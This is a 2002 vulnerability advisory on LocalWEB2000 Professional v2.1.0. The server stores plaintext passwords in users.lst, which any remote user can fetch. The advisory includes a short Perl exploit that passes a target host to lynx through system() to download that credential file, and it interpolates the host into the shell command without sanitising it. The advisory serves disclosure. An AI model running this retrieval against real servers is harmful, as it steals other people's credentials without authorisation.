| LocalWEB2000
Professional v2.1.0 Unauthorized Password Disclosure Vulnerability
Type File Disclosure Release Date August 29, 2002 Product / Vendor LocalWEB2000 is an HTTP server for the Windows suite of operating systems. LocalWEB2000 is available in two versions, Standard and Professional. http://www.intranet-server.co.uk Summary LocalWEB2000 professional webserver v2.1.0 saves the passwords somewhere insecure. In LocalWeb2000 "users.lst" (C:\Program Files\LocalWEB\users.lst) file can be opened any text editor and the usernames and the passwords can be view clearly and this file accessible remote users without any username&password restriction. http://target/users.lst Exploit An exploit for this vulnerability exists and is available below. ==================== SNIP ==================== #!/usr/bin/perl -w die "\nLocalWEB2000 Professional v2.1.0 Unauthorized Password Disclosure Vulnerability / SecurityOffice\n\nUsage: $0 <host>" if $#ARGV <0; print &get($ARGV[0]); exit 0; sub get { $host = $ARGV[0]; system "lynx $host/users.lst"; print "Done\n\n"; } ==================== SNIP ==================== Tested LocalWEB2000 v2.1.0 / Windows 2000 sp3 Vulnerable LocalWEB2000 v2.1.0 Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author Tamer Sahin |